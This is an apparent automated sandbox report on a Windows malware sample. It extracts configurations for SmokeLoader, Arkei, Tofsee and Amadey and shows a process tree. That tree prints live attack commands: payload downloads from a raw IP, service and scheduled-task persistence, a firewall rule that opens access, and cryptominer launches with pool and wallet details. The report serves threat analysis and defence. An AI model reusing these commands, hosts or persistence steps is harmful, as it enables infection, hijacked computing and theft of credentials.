Analysis

  • max time kernel
    72s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    14-01-2022 16:09

General

  • Target

    0845487bcec95dd2dfbbcadd06c8bfed9b13a14bd1b7f803b6681a5c2b3d2424.exe

  • Size

    313KB

  • MD5

    75c80428ff3f49e9fd1ff7da6b23aa02

  • SHA1

    0a7f11b49e94ba27968f48b3a83a95a30c66008c

  • SHA256

    0845487bcec95dd2dfbbcadd06c8bfed9b13a14bd1b7f803b6681a5c2b3d2424

  • SHA512

    178a358df4c19af90f8783d6ad486f1a675c8678cb3d87719e9654d2be8da3ceffb788ae1151200ab260ad6cb9b473a71e8592e6639fd319700aa1738374177b

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

arkei

Botnet

Default

C2

http://file-file-host4.com/tratata.php

Extracted

Family

tofsee

C2

patmushta.info

parubey.info

Extracted

Family

amadey

Version

3.01

C2

185.215.113.35/d2VxjasuwS/index.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Arkei

    Arkei is an infostealer written in C++.

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 2 IoCs
  • LoaderBot executable 2 IoCs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 13 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 52 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0845487bcec95dd2dfbbcadd06c8bfed9b13a14bd1b7f803b6681a5c2b3d2424.exe
    "C:\Users\Admin\AppData\Local\Temp\0845487bcec95dd2dfbbcadd06c8bfed9b13a14bd1b7f803b6681a5c2b3d2424.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2656
    • C:\Users\Admin\AppData\Local\Temp\0845487bcec95dd2dfbbcadd06c8bfed9b13a14bd1b7f803b6681a5c2b3d2424.exe
      "C:\Users\Admin\AppData\Local\Temp\0845487bcec95dd2dfbbcadd06c8bfed9b13a14bd1b7f803b6681a5c2b3d2424.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3580
  • C:\Users\Admin\AppData\Local\Temp\8D6.exe
    C:\Users\Admin\AppData\Local\Temp\8D6.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:3600
  • C:\Users\Admin\AppData\Local\Temp\1049.exe
    C:\Users\Admin\AppData\Local\Temp\1049.exe
    1⤵
    • Executes dropped EXE
    PID:1512
  • C:\Users\Admin\AppData\Local\Temp\15C8.exe
    C:\Users\Admin\AppData\Local\Temp\15C8.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1508
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ztzlscen\
      2⤵
        PID:1736
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vpnhixfu.exe" C:\Windows\SysWOW64\ztzlscen\
        2⤵
          PID:1048
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ztzlscen binPath= "C:\Windows\SysWOW64\ztzlscen\vpnhixfu.exe /d\"C:\Users\Admin\AppData\Local\Temp\15C8.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:4080
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description ztzlscen "wifi internet conection"
            2⤵
              PID:1348
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start ztzlscen
              2⤵
                PID:940
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:4044
              • C:\Users\Admin\AppData\Local\Temp\1C32.exe
                C:\Users\Admin\AppData\Local\Temp\1C32.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1148
                • C:\Users\Admin\AppData\Local\Temp\1C32.exe
                  C:\Users\Admin\AppData\Local\Temp\1C32.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2152
              • C:\Windows\SysWOW64\ztzlscen\vpnhixfu.exe
                C:\Windows\SysWOW64\ztzlscen\vpnhixfu.exe /d"C:\Users\Admin\AppData\Local\Temp\15C8.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2116
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  PID:3724
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:340
              • C:\Users\Admin\AppData\Local\Temp\7C93.exe
                C:\Users\Admin\AppData\Local\Temp\7C93.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3112
                • C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                  "C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2228
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\
                    3⤵
                      PID:3712
                      • C:\Windows\SysWOW64\reg.exe
                        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\
                        4⤵
                          PID:2752
                      • C:\Windows\SysWOW64\schtasks.exe
                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F
                        3⤵
                        • Creates scheduled task(s)
                        PID:1744
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                    • Accesses Microsoft Outlook profiles
                    • outlook_office_path
                    • outlook_win_path
                    PID:3948
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    1⤵
                      PID:1300
                    • C:\Users\Admin\AppData\Local\Temp\94DE.exe
                      C:\Users\Admin\AppData\Local\Temp\94DE.exe
                      1⤵
                      • Executes dropped EXE
                      PID:2412
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 400
                        2⤵
                        • Program crash
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1988
                    • C:\Users\Admin\AppData\Local\Temp\980C.exe
                      C:\Users\Admin\AppData\Local\Temp\980C.exe
                      1⤵
                      • Executes dropped EXE
                      PID:2128
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2128 -s 884
                        2⤵
                        • Program crash
                        PID:1360
                    • C:\Users\Admin\AppData\Local\Temp\9C62.exe
                      C:\Users\Admin\AppData\Local\Temp\9C62.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:2960
                    • C:\Users\Admin\AppData\Local\Temp\A24F.exe
                      C:\Users\Admin\AppData\Local\Temp\A24F.exe
                      1⤵
                      • Executes dropped EXE
                      PID:2320
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A890.tmp\A891.tmp\A892.bat C:\Users\Admin\AppData\Local\Temp\A24F.exe"
                        2⤵
                          PID:992
                          • C:\Users\Admin\AppData\Local\Temp\A890.tmp\A891.tmp\extd.exe
                            C:\Users\Admin\AppData\Local\Temp\A890.tmp\A891.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                            3⤵
                            • Executes dropped EXE
                            PID:3664
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\10954\360t.vbs"
                            3⤵
                              PID:3832
                            • C:\Users\Admin\AppData\Local\Temp\A890.tmp\A891.tmp\extd.exe
                              C:\Users\Admin\AppData\Local\Temp\A890.tmp\A891.tmp\extd.exe "/download" "http://81.163.30.181/1.exe" "setup_c.exe" "" "" "" "" "" ""
                              3⤵
                                PID:3796
                              • C:\Users\Admin\AppData\Local\Temp\10954\setup_c.exe
                                setup_c.exe
                                3⤵
                                  PID:3152
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 412
                                    4⤵
                                    • Program crash
                                    PID:2864
                                • C:\Users\Admin\AppData\Local\Temp\A890.tmp\A891.tmp\extd.exe
                                  C:\Users\Admin\AppData\Local\Temp\A890.tmp\A891.tmp\extd.exe "/download" "http://81.163.30.181/2.exe" "setup_m.exe" "" "" "" "" "" ""
                                  3⤵
                                    PID:2876
                                  • C:\Users\Admin\AppData\Local\Temp\10954\setup_m.exe
                                    setup_m.exe
                                    3⤵
                                      PID:2080
                                      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                        4⤵
                                          PID:3128
                                      • C:\Users\Admin\AppData\Local\Temp\A890.tmp\A891.tmp\extd.exe
                                        C:\Users\Admin\AppData\Local\Temp\A890.tmp\A891.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                                        3⤵
                                          PID:1896
                                    • C:\Users\Admin\AppData\Local\Temp\CBD1.exe
                                      C:\Users\Admin\AppData\Local\Temp\CBD1.exe
                                      1⤵
                                        PID:4072
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 400
                                          2⤵
                                          • Program crash
                                          PID:3712
                                      • C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                                        C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                                        1⤵
                                          PID:708
                                        • C:\Users\Admin\AppData\Local\Temp\D095.exe
                                          C:\Users\Admin\AppData\Local\Temp\D095.exe
                                          1⤵
                                            PID:3628
                                          • C:\Users\Admin\AppData\Local\Temp\F7C5.exe
                                            C:\Users\Admin\AppData\Local\Temp\F7C5.exe
                                            1⤵
                                              PID:2876
                                            • C:\Users\Admin\AppData\Local\Temp\187D.exe
                                              C:\Users\Admin\AppData\Local\Temp\187D.exe
                                              1⤵
                                                PID:748

                                              Network

                                              MITRE ATT&CK Enterprise v6

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • memory/340-208-0x0000000003000000-0x00000000030F1000-memory.dmp

                                                Filesize

                                                964KB

                                              • memory/340-203-0x0000000003000000-0x00000000030F1000-memory.dmp

                                                Filesize

                                                964KB

                                              • memory/1148-144-0x0000000005160000-0x00000000051D6000-memory.dmp

                                                Filesize

                                                472KB

                                              • memory/1148-147-0x00000000052F0000-0x00000000052F1000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/1148-141-0x00000000008A0000-0x000000000092A000-memory.dmp

                                                Filesize

                                                552KB

                                              • memory/1148-145-0x0000000005100000-0x000000000511E000-memory.dmp

                                                Filesize

                                                120KB

                                              • memory/1148-142-0x00000000008A0000-0x000000000092A000-memory.dmp

                                                Filesize

                                                552KB

                                              • memory/1148-148-0x00000000010C0000-0x00000000010C1000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/1148-155-0x00000000059B0000-0x0000000005EAE000-memory.dmp

                                                Filesize

                                                5.0MB

                                              • memory/1300-196-0x0000000000960000-0x000000000096C000-memory.dmp

                                                Filesize

                                                48KB

                                              • memory/1300-195-0x0000000000970000-0x0000000000977000-memory.dmp

                                                Filesize

                                                28KB

                                              • memory/1508-140-0x0000000000400000-0x000000000055E000-memory.dmp

                                                Filesize

                                                1.4MB

                                              • memory/1508-139-0x0000000000650000-0x0000000000663000-memory.dmp

                                                Filesize

                                                76KB

                                              • memory/1512-130-0x00000000001E0000-0x00000000001FC000-memory.dmp

                                                Filesize

                                                112KB

                                              • memory/1512-129-0x0000000000729000-0x000000000073A000-memory.dmp

                                                Filesize

                                                68KB

                                              • memory/1512-131-0x0000000000400000-0x000000000055F000-memory.dmp

                                                Filesize

                                                1.4MB

                                              • memory/1928-119-0x0000000000860000-0x0000000000876000-memory.dmp

                                                Filesize

                                                88KB

                                              • memory/1928-149-0x0000000002950000-0x0000000002966000-memory.dmp

                                                Filesize

                                                88KB

                                              • memory/2080-308-0x0000000000350000-0x0000000000796000-memory.dmp

                                                Filesize

                                                4.3MB

                                              • memory/2080-315-0x0000000071D30000-0x0000000071DB0000-memory.dmp

                                                Filesize

                                                512KB

                                              • memory/2080-319-0x00000000746A0000-0x00000000759E8000-memory.dmp

                                                Filesize

                                                19.3MB

                                              • memory/2080-317-0x00000000764B0000-0x0000000076A34000-memory.dmp

                                                Filesize

                                                5.5MB

                                              • memory/2080-312-0x0000000075FB0000-0x00000000760A1000-memory.dmp

                                                Filesize

                                                964KB

                                              • memory/2080-311-0x0000000074010000-0x00000000741D2000-memory.dmp

                                                Filesize

                                                1.8MB

                                              • memory/2080-310-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/2080-307-0x0000000000350000-0x0000000000796000-memory.dmp

                                                Filesize

                                                4.3MB

                                              • memory/2116-166-0x0000000000400000-0x000000000055E000-memory.dmp

                                                Filesize

                                                1.4MB

                                              • memory/2116-157-0x000000000072D000-0x000000000073E000-memory.dmp

                                                Filesize

                                                68KB

                                              • memory/2128-255-0x0000000000400000-0x0000000002BC5000-memory.dmp

                                                Filesize

                                                39.8MB

                                              • memory/2128-257-0x0000000004C40000-0x0000000004CD2000-memory.dmp

                                                Filesize

                                                584KB

                                              • memory/2128-268-0x0000000000400000-0x0000000002BC5000-memory.dmp

                                                Filesize

                                                39.8MB

                                              • memory/2128-270-0x0000000004CE0000-0x0000000004D2F000-memory.dmp

                                                Filesize

                                                316KB

                                              • memory/2128-248-0x000000000307A000-0x00000000030FB000-memory.dmp

                                                Filesize

                                                516KB

                                              • memory/2128-250-0x0000000003100000-0x00000000031A5000-memory.dmp

                                                Filesize

                                                660KB

                                              • memory/2128-264-0x0000000000400000-0x0000000002BC5000-memory.dmp

                                                Filesize

                                                39.8MB

                                              • memory/2128-256-0x0000000004AA0000-0x0000000004B08000-memory.dmp

                                                Filesize

                                                416KB

                                              • memory/2128-249-0x0000000000400000-0x0000000002BC5000-memory.dmp

                                                Filesize

                                                39.8MB

                                              • memory/2128-247-0x0000000000400000-0x0000000002BC5000-memory.dmp

                                                Filesize

                                                39.8MB

                                              • memory/2128-251-0x0000000000400000-0x0000000002BC5000-memory.dmp

                                                Filesize

                                                39.8MB

                                              • memory/2128-238-0x0000000002FB0000-0x0000000003070000-memory.dmp

                                                Filesize

                                                768KB

                                              • memory/2128-237-0x0000000002F10000-0x0000000002FB0000-memory.dmp

                                                Filesize

                                                640KB

                                              • memory/2152-163-0x0000000000400000-0x0000000000420000-memory.dmp

                                                Filesize

                                                128KB

                                              • memory/2152-172-0x0000000004F00000-0x0000000004F3E000-memory.dmp

                                                Filesize

                                                248KB

                                              • memory/2152-158-0x0000000000400000-0x0000000000420000-memory.dmp

                                                Filesize

                                                128KB

                                              • memory/2152-162-0x0000000000400000-0x0000000000420000-memory.dmp

                                                Filesize

                                                128KB

                                              • memory/2152-169-0x0000000005420000-0x0000000005A26000-memory.dmp

                                                Filesize

                                                6.0MB

                                              • memory/2152-170-0x0000000004EA0000-0x0000000004EB2000-memory.dmp

                                                Filesize

                                                72KB

                                              • memory/2152-171-0x0000000004FD0000-0x00000000050DA000-memory.dmp

                                                Filesize

                                                1.0MB

                                              • memory/2152-173-0x0000000004E10000-0x0000000005416000-memory.dmp

                                                Filesize

                                                6.0MB

                                              • memory/2152-174-0x0000000004F80000-0x0000000004FCB000-memory.dmp

                                                Filesize

                                                300KB

                                              • memory/2152-175-0x0000000005250000-0x00000000052B6000-memory.dmp

                                                Filesize

                                                408KB

                                              • memory/2152-176-0x0000000005CB0000-0x0000000005D26000-memory.dmp

                                                Filesize

                                                472KB

                                              • memory/2152-177-0x0000000005E00000-0x0000000005E92000-memory.dmp

                                                Filesize

                                                584KB

                                              • memory/2152-178-0x00000000063A0000-0x000000000689E000-memory.dmp

                                                Filesize

                                                5.0MB

                                              • memory/2152-179-0x0000000005FA0000-0x0000000005FBE000-memory.dmp

                                                Filesize

                                                120KB

                                              • memory/2152-180-0x0000000006A70000-0x0000000006C32000-memory.dmp

                                                Filesize

                                                1.8MB

                                              • memory/2152-181-0x0000000007170000-0x000000000769C000-memory.dmp

                                                Filesize

                                                5.2MB

                                              • memory/2228-201-0x0000000000400000-0x0000000000578000-memory.dmp

                                                Filesize

                                                1.5MB

                                              • memory/2228-197-0x00000000007C1000-0x00000000007DF000-memory.dmp

                                                Filesize

                                                120KB

                                              • memory/2412-212-0x00000000024D0000-0x0000000002530000-memory.dmp

                                                Filesize

                                                384KB

                                              • memory/2656-118-0x0000000000560000-0x000000000060E000-memory.dmp

                                                Filesize

                                                696KB

                                              • memory/2656-115-0x00000000007CA000-0x00000000007DA000-memory.dmp

                                                Filesize

                                                64KB

                                              • memory/2960-262-0x0000000006930000-0x000000000694E000-memory.dmp

                                                Filesize

                                                120KB

                                              • memory/2960-227-0x0000000071D30000-0x0000000071DB0000-memory.dmp

                                                Filesize

                                                512KB

                                              • memory/2960-236-0x0000000005B40000-0x0000000005B41000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/2960-221-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/2960-231-0x0000000005A30000-0x0000000005A6E000-memory.dmp

                                                Filesize

                                                248KB

                                              • memory/2960-230-0x0000000005B50000-0x0000000005C5A000-memory.dmp

                                                Filesize

                                                1.0MB

                                              • memory/2960-258-0x0000000006C70000-0x000000000716E000-memory.dmp

                                                Filesize

                                                5.0MB

                                              • memory/2960-259-0x0000000005D90000-0x0000000005DF6000-memory.dmp

                                                Filesize

                                                408KB

                                              • memory/2960-260-0x0000000006870000-0x00000000068E6000-memory.dmp

                                                Filesize

                                                472KB

                                              • memory/2960-229-0x00000000059D0000-0x00000000059E2000-memory.dmp

                                                Filesize

                                                72KB

                                              • memory/2960-224-0x0000000001010000-0x0000000001093000-memory.dmp

                                                Filesize

                                                524KB

                                              • memory/2960-226-0x0000000001010000-0x0000000001093000-memory.dmp

                                                Filesize

                                                524KB

                                              • memory/2960-223-0x0000000075FB0000-0x00000000760A1000-memory.dmp

                                                Filesize

                                                964KB

                                              • memory/2960-261-0x0000000006990000-0x0000000006A22000-memory.dmp

                                                Filesize

                                                584KB

                                              • memory/2960-220-0x0000000001010000-0x0000000001093000-memory.dmp

                                                Filesize

                                                524KB

                                              • memory/2960-239-0x0000000005A70000-0x0000000005ABB000-memory.dmp

                                                Filesize

                                                300KB

                                              • memory/2960-240-0x00000000711A0000-0x00000000711EB000-memory.dmp

                                                Filesize

                                                300KB

                                              • memory/2960-234-0x00000000746A0000-0x00000000759E8000-memory.dmp

                                                Filesize

                                                19.3MB

                                              • memory/2960-228-0x0000000006160000-0x0000000006766000-memory.dmp

                                                Filesize

                                                6.0MB

                                              • memory/2960-225-0x00000000011A0000-0x00000000011E5000-memory.dmp

                                                Filesize

                                                276KB

                                              • memory/2960-232-0x00000000764B0000-0x0000000076A34000-memory.dmp

                                                Filesize

                                                5.5MB

                                              • memory/2960-222-0x0000000074010000-0x00000000741D2000-memory.dmp

                                                Filesize

                                                1.8MB

                                              • memory/2960-219-0x0000000001010000-0x0000000001093000-memory.dmp

                                                Filesize

                                                524KB

                                              • memory/3112-193-0x00000000001C0000-0x00000000001F8000-memory.dmp

                                                Filesize

                                                224KB

                                              • memory/3112-194-0x0000000000400000-0x0000000000578000-memory.dmp

                                                Filesize

                                                1.5MB

                                              • memory/3128-339-0x00000000001B0000-0x00000000001C4000-memory.dmp

                                                Filesize

                                                80KB

                                              • memory/3580-116-0x0000000000400000-0x0000000000409000-memory.dmp

                                                Filesize

                                                36KB

                                              • memory/3600-128-0x0000000000400000-0x0000000000452000-memory.dmp

                                                Filesize

                                                328KB

                                              • memory/3600-126-0x0000000000460000-0x00000000005AA000-memory.dmp

                                                Filesize

                                                1.3MB

                                              • memory/3600-127-0x0000000000460000-0x00000000005AA000-memory.dmp

                                                Filesize

                                                1.3MB

                                              • memory/3628-277-0x0000000000120000-0x0000000000121000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/3628-275-0x0000000000A10000-0x0000000000AB4000-memory.dmp

                                                Filesize

                                                656KB

                                              • memory/3628-294-0x00000000746A0000-0x00000000759E8000-memory.dmp

                                                Filesize

                                                19.3MB

                                              • memory/3628-290-0x00000000764B0000-0x0000000076A34000-memory.dmp

                                                Filesize

                                                5.5MB

                                              • memory/3628-298-0x00000000711A0000-0x00000000711EB000-memory.dmp

                                                Filesize

                                                300KB

                                              • memory/3628-282-0x0000000071D30000-0x0000000071DB0000-memory.dmp

                                                Filesize

                                                512KB

                                              • memory/3628-278-0x0000000074010000-0x00000000741D2000-memory.dmp

                                                Filesize

                                                1.8MB

                                              • memory/3628-279-0x0000000075FB0000-0x00000000760A1000-memory.dmp

                                                Filesize

                                                964KB

                                              • memory/3628-276-0x0000000000A10000-0x0000000000AB4000-memory.dmp

                                                Filesize

                                                656KB

                                              • memory/3724-164-0x0000000002DD0000-0x0000000002DE5000-memory.dmp

                                                Filesize

                                                84KB

                                              • memory/3724-167-0x0000000002CE0000-0x0000000002CE1000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/3724-168-0x0000000002CE0000-0x0000000002CE1000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/3948-191-0x0000000000400000-0x0000000000474000-memory.dmp

                                                Filesize

                                                464KB

                                              • memory/3948-192-0x0000000000170000-0x00000000001DB000-memory.dmp

                                                Filesize

                                                428KB